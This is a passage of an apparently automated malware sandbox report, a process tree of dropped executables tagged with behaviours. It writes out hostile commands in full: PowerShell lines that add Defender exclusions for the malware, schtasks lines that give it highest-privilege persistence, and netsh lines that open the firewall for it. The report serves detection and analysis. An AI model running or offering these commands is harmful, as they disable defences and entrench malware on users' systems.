C:\Windows\system32\PING.EXEping -n 10 localhost47⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"47⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f48⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\MngaKF7b53Dj.bat" "48⤵
-
C:\Windows\system32\chcp.comchcp 6500149⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost49⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"49⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f50⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7EcKFbEQ1ZiH.bat" "50⤵
-
C:\Windows\system32\chcp.comchcp 6500151⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost51⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"51⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f52⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\I2j2GkGBZOES.bat" "52⤵
-
C:\Windows\system32\chcp.comchcp 6500153⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost53⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"53⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f54⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RNz1uvGpUgez.bat" "54⤵
-
C:\Windows\system32\chcp.comchcp 6500155⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost55⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"55⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f56⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\k2jLo3rXCJWt.bat" "56⤵
-
C:\Windows\system32\chcp.comchcp 6500157⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost57⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"57⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f58⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\y6Trnv7ZJX1X.bat" "58⤵
-
C:\Windows\system32\chcp.comchcp 6500159⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost59⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"59⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f60⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\fEvSYzCLUJQZ.bat" "60⤵
-
C:\Windows\system32\chcp.comchcp 6500161⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost61⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"61⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f62⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\pYWhLQcagJYm.bat" "62⤵
-
C:\Windows\system32\chcp.comchcp 6500163⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost63⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"63⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f64⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\NstGyAYrCysF.bat" "64⤵
-
C:\Windows\system32\chcp.comchcp 6500165⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost65⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"65⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f66⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\oCQhYW7dIygu.bat" "66⤵
-
C:\Windows\system32\chcp.comchcp 6500167⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost67⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"67⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f68⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\WKuGdTLfV5VT.bat" "68⤵
-
C:\Windows\system32\chcp.comchcp 6500169⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost69⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"69⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f70⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3SGnYyUqWutg.bat" "70⤵
-
C:\Windows\system32\chcp.comchcp 6500171⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost71⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"71⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f72⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZKusn7DnxPKA.bat" "72⤵
-
C:\Windows\system32\chcp.comchcp 6500173⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost73⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"73⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f74⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\UOXI5N4uXkdz.bat" "74⤵
-
C:\Windows\system32\chcp.comchcp 6500175⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost75⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"75⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f76⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\o1rKcpMALpmF.bat" "76⤵
-
C:\Windows\system32\chcp.comchcp 6500177⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost77⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"77⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f78⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7GM83KmJJjYP.bat" "78⤵
-
C:\Windows\system32\chcp.comchcp 6500179⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost79⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"79⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f80⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RTjOjsihYQxa.bat" "80⤵
-
C:\Windows\system32\chcp.comchcp 6500181⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost81⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"81⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f82⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\KNgXA6Y7Njws.bat" "82⤵
-
C:\Windows\system32\chcp.comchcp 6500183⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost83⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"83⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f84⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\jJV54eGvM8EI.bat" "84⤵
-
C:\Windows\system32\chcp.comchcp 6500185⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost85⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"85⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f86⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZFlEJ29wuo9d.bat" "86⤵
-
C:\Windows\system32\chcp.comchcp 6500187⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost87⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"87⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f88⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\iENSba3RM183.bat" "88⤵
-
C:\Windows\system32\chcp.comchcp 6500189⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost89⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"89⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f90⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Xj2Ko1EtaXnE.bat" "90⤵
-
C:\Windows\system32\chcp.comchcp 6500191⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost91⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"91⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f92⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\JW5vwJedzTIk.bat" "92⤵
-
C:\Windows\system32\chcp.comchcp 6500193⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost93⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"93⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f94⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4EYIhPBvvAxf.bat" "94⤵
-
C:\Windows\system32\chcp.comchcp 6500195⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost95⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"95⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f96⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7Z5eRfAGJa59.bat" "96⤵
-
C:\Windows\system32\chcp.comchcp 6500197⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost97⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"97⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f98⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FHLGSWHCCxNM.bat" "98⤵
-
C:\Windows\system32\chcp.comchcp 6500199⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost99⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Network.exe"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\rea.exe"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "ISS Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpABE9.tmp"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "ISS Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAC95.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\mod.exe"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\Server.exe"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"7⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE8⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"9⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE10⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"11⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"13⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE14⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"15⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE16⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"16⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"17⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE18⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"18⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"19⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE20⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"20⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"21⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE22⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"22⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"23⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE24⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"25⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE26⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"27⤵
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE28⤵
- Modifies Windows Firewall
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"29⤵
- Drops startup file
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE30⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"31⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE32⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"33⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE34⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"35⤵
- Drops startup file
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE36⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"37⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE38⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"39⤵
- Drops file in System32 directory
- Drops file in Program Files directory
-
